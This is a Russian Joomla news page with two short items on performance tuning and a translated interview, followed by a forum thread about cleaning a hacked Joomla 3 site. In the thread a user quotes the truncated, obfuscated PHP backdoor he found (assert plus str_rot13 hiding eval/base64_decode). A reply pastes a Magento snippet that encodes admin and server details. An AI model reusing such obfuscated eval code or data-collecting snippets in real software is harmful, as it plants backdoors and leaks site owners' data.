Новости Joomla

Человек на GitHub ускорил Joomla в 600 раз на объёме 150к+ материалов в 1700+ категориях

Человек на GitHub ускорил Joomla в 600 раз на объёме 150к+ материалов в 1700+ категориях

👩‍💻 Человек на GitHub ускорил Joomla в 600 раз на объёме 150к+ материалов в 1700+ категориях. На старте его сайт на Joomla 3 вообще не смог обновиться на Joomla 5. Пришлось делать экспорт/импорт материалов. Проделав всё это он запустил-таки этот объём данных на Joomla 5. Тестовый скрипт грузил 200 материалов из этого объёма всего за 94 секунды ))) А главная страница с категориями грузилась 20 секунд. Добавив индекс для таблицы #__content

CREATE INDEX idx_catid_state ON #__content (catid, state);
он сократил время загрузки категорий до 1 секунды. Затем наш герой решил поковырять SQL-запрос в ArticleModel, который отвечает за выборку материалов. И решил заменить тип JOIN на STRAIGHT_JOIN для категорий.
// ->from($db->quoteName('#__content', 'a'))->from(    $db->quoteName('#__content', 'a')    . ' STRAIGHT_JOIN ' . $db->quoteName('#__categories', 'c')    . ' ON ' . $db->quoteName('c.id') . ' = ' . $db->quoteName('a.catid'))// ->join('LEFT', $db->quoteName('#__categories', 'c'), $db->quoteName('c.id') . ' = ' . $db->quoteName('a.catid'))
Что сократило загрузку 200 материалов из 150к с 94 секунд до 5. К слову сказать, боевой сайт на Joomla 3 крутится на 12CPU 64GB рамы. А все манипуляции с кодом он делает на базовом 1CPU 1GB сервере и замеры скорости даны именно для базового сервера. Но это всё в дискуссии, хотя в идеале должно вылиться в Pull Requests. Мы - Open Source сообщество, где никто никому ничего не должен. Джунгли. Но человек ищет пути оптимизации Joomla и предлагает решения. Если оказать поддержку и предложить помощь хотя бы с тестированием самых разнообразных сценариев, то возможно эти улучшения смогут войти в ядро. Пусть не быстро, пусть через несколько лет, пусть не все, но войдут. Достаточно предложить руку помощи и приложить немного усилий.
Дискуссию на GitHub можно почитать здесь.@joomlafeed#joomla #community #php

Перевод и публикация интервью с Joomla евангелистом на греческом портале Joomla

Перевод и публикация интервью на греческом портале Joomla 🇬🇷

Утро, просматриваешь входящие письма и изучаешь новости и внезапно обнаруживаешь, что инициатива, которую ты начал, подхватывается другими людьми. 🎉

Недавно я взял интервью у Билла (Василиса) Коциаса - руководителя студии, читающего лекции в университете и популяризатора Joomla в Греции. Это интервью из журнала NorrNext, в оригинале на английском, теперь доступно на греческом языке и опубликовано на портале joomla.gr. 🎉

До чего же приятно… 😇😊 Работа замечена и с ней посчитали необходимым ознакомить аудиторию страны, в которой Билл читает лекции. И это солнечная Греция - страна, страна, с которой Россию многое связывает. 🇬🇷🇷🇺🕊

Смотрю на греческий алфавит и тут же рисуются картины белоснежных зданий в окружении винограда и амфор, красивых женщин в сандалиях и мужественных воинов, охраняющих покой полисов, в которых ученые мужи работают над трудами, позже вошедшими в века. Красиво! 😇Но вернемся к интервью.

Из него вы узнаете, что в Греции доля Joomla среди CMS занимает порядка 30-40%. По моему мнению это - самый высокий показатель во всем мире. Также чтение лекций о Joomla в университетах позволит привести новых пользователей и к тому же молодое поколение. Ну и огромное кол-во сертификтатов Билла на стене (смотрим фото в статье) свидетельствует о том, что Joomla может применяться как профессиональный инструмент.

🌐 Оригинальное интервью (на английском)
🇬🇷 Интервью на греческом портале (joomla.gr)

Что насчет перевода на русский? Увы, времени всего 24 часа в сутках. Я продолжаю готовить новые интервью. Возможно, после завершения выпуска журнала, рассмотрю перевод некоторых интервью на русский. Но я об этом не говорил. 😊 В блоге @eugenius_blog публикую анонсы интересных событий из мира Joomla, интервью, уроки и полезные советы, а также делюсь мыслями:, связанными с разработкой и веб-дизайном.

• 14 Ответов
  • 1189 Просмотров
*

Mrakobes_87

• Новичок
  • 9
  • 0 / 0
Всем доброго времени суток. Столкнулся с такой проблемой: сайт время от времени очень медленно грузится либо ошибку 502 выдает. Сайт: http://oknoptk.ru/ на Joomla 3. В тех поддержке хостинга говорят, что проблема с длительной загрузкой возникает потому, что при попытке загрузить индексную страницу Вашего сайта происходит обращение к стороннему ресурсу 95.181.179.152.
Сторонний ресурс это некто: Neohost.net

Проверка сайта на внешние ссылки ничего толкового не дала. Плагины и модули установлены из проверенных источников и на других сайтах проблем не возникает.

Уважаемые форумчане, подскажите кто, что думает по этому поводу? Как решить проблему?
*

umbabaraumba

• Живу я здесь
  • 2415
  • 153 / 1
  • если помог можете поставить +
Errare humanum est
Ubuntu по-русски
Пишу не сложные модули и компоненты, не дорого но не срочно
*

Mrakobes_87

• Новичок
  • 9
  • 0 / 0
Смотреть логи
Логи тоже ничего путного не дают, нет в них ошибок с указанным IP
*

robert

• Живу я здесь
  • 4974
  • 457 / 20
Проверка сайта на внешние ссылки ничего толкового не дала.
А jextensions.com - внутренняя ссылка? Она, наверное, не имеет отношения к вопросу, но дает повод усомниться в компетентности проверки.
Логи тоже ничего путного не дают, нет в них ошибок с указанным IP
Почему это должно быть ошибкой?
« Последнее редактирование: 02.06.2016, 09:34:55 от robert »
Не будь паразитом, сделай что-нибудь самостоятельно!
*

Mrakobes_87

• Новичок
  • 9
  • 0 / 0
А jextensions.com - внутренняя ссылка? Она, наверное, не имеет отношения к вопросу, но дает повод усомниться в компетентности проверки.Почему это должно быть ошибкой?
Я знаю куда ведет ссылка jextensions.com и еще одна, которая обнаружена. Поэтому о ней ни чего не написано выше. Тем более удаление расширений с этой ссылкой ничего не дало. Поиск не обнаружил именно ссылку на ID который грузит сайт.
Я далеко не спец в чистке взломанного сайта. Поэтому прошу реальных возможных решений.
*

Mrakobes_87

• Новичок
  • 9
  • 0 / 0
Проблема решена путем долгого и мучительного поиска ^-^
Может кому пригодится. В некоторые файлы сайта попал вот такой сцуко код:
 ...//###=CACHE START=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr ("nJLtXTymp2I0XPEcLaLcXF... и т.д.

*

wishlight

• Гуру
  • 5072
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Ну он не просто так туда попал. Ищите источник заражения.
*

pavelrer

• Давно я тут
  • 615
  • 10 / 2
вот жуки "onfr64_qrpbqr" - это base64

http://base64.ru/  и вставляем что в кавычках.
расшифровываем, и смотрим пути от кудова лезит.

Вероятно будет что-то типа

$module = 'Magmodules_Shippingperkm';
$module_version = 'Magmodule_Shipkm1053';
$module_path = 'shippingperkm/general/';
$module_server = str_replace('www.', '', $_SERVER['HTTP_HOST']);
$module_installed = Mage::getConfig()->getNode()->modules->Magmodules_Shippingperkm->version;
return base64_encode(base64_encode(base64_encode($module . ';' . $module_version . ';' . $module_installed . ';' . trim(Mage::getModel('core/config_data')->load($module_path . 'license_key', 'path')->getValue()). ';' . $module_server . ';' . Mage::getUrl(). ';' . Mage::getSingleton('admin/session')->getUser()->getEmail(). ';' . Mage::getSingleton('admin/session')->getUser()->getName(). ';' . $_SERVER['SERVER_ADDR'])));
*

Mrakobes_87

• Новичок
  • 9
  • 0 / 0
вот жуки "onfr64_qrpbqr" - это base64

http://base64.ru/  и вставляем что в кавычках.
расшифровываем, и смотрим пути от кудова лезит.

Согласно декодеру после расшифровки получается что то типа: ⷫ늫庫
Китайцы мать вашу :(
Кто нибудь в китайском понимает?...
*

Mrakobes_87

• Новичок
  • 9
  • 0 / 0
Народ, ещё вопрос почти что в тему.
Делал больше года назад сайт один: http://kvadra-group.com/
В один ужасный момент его ломанули и навтыкали ссылок на какой то, опять же китайский интернет магазин. Пока Google не маякнул, я не заметил (так как сайт работал в нормальном режиме). Сайт я почистил, Google санкции снял. Но вот проблема, сайт попал в реестр запрещенных... Только на одних провайдераж он открывается без проблем, а на некоторых (какой то "Атлас телеком" например, как раз оказавшийся у клиента) он сцуко не открывается. Тех поддержка этого атласа снимать блокировку отказывается.
Может кто знает как решить проблему? И еще вопрос, у кого какой провайдер, сайт открывается или нет? ;)
*

pavelrer

• Давно я тут
  • 615
  • 10 / 2
Согласно декодеру после расшифровки получается что то типа: ⷫ늫庫
Неправильно наверное декоднули или не в ту сторону.

Тот код что я написал, это из вашего начала, так что должен получиться код php скрипта.

Тех поддержка этого атласа снимать блокировку отказывается.

Спросить у тех.поддержки, что нужно выполнить для снятия санкций. Хотя они могут базу спам сайтов тянуть из другого места и по ней автоматом работать.

*

Mrakobes_87

• Новичок
  • 9
  • 0 / 0
Неправильно наверное декоднули или не в ту сторону.

Тот код что я написал, это из вашего начала, так что должен получиться код php скрипта.

Декодировал вот этим http://base64.ru/ Х.з.
Спросить у тех.поддержки, что нужно выполнить для снятия санкций. Хотя они могут базу спам сайтов тянуть из другого места и по ней автоматом работать.

Спрашивал. Они не знают, только отмахиваются, мол не наша проблема.
*

pavelrer

• Давно я тут
  • 615
  • 10 / 2
Тут надо понять кто блокирует.
Если провайдер, и решать задачу не хочет совсем.

То нагадить такому провайдеру полный таз от китайского noname, с предупреждением о санкциях.
Разослав всех им клиетам, страшное письмо, а еще лучше если они занимаются хостингом.
Найти всех клиентов и накакать там! Вони будет огого  ;D

Но лучше искать общий язык, а то можно и нагадить не тому ;D
*

Mrakobes_87

• Новичок
  • 9
  • 0 / 0
Тут надо понять кто блокирует.
Если провайдер, и решать задачу не хочет совсем.

То нагадить такому провайдеру полный таз от китайского noname, с предупреждением о санкциях.
Разослав всех им клиетам, страшное письмо, а еще лучше если они занимаются хостингом.
Найти всех клиентов и накакать там! Вони будет огого  ;D

Но лучше искать общий язык, а то можно и нагадить не тому ;D
Провайдер однозначно не хочет решать проблему. Послали и меня, как админа, и клиентов с которыми у них договор заключен. Хостер на котором сайт лежит пошел на встречу, меняют серваки где сайт лежит, ну и IP сайта соответственно. Может поможет. А кто столкнется с провайдером "Атлас телеком", посылайте из в ж...у
*

pavelrer

• Давно я тут
  • 615
  • 10 / 2
Хостер на котором сайт лежит пошел на встречу, меняют серваки где сайт лежит, ну и IP сайта соответственно.

Это конечно решение, но Если провайдер блокирует по IP, т.е если это шарик то провайдер блокирует все хосты из-за одного.
тоды поможет.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться

Не работает мобильная версия сайта

Автор jeans

Ответов: 4
Просмотров: 1390
Последний ответ 21.05.2025, 12:44:06
от jeans
Разные меню для мобильной и для ПК версии сайта

Автор jimka

Ответов: 7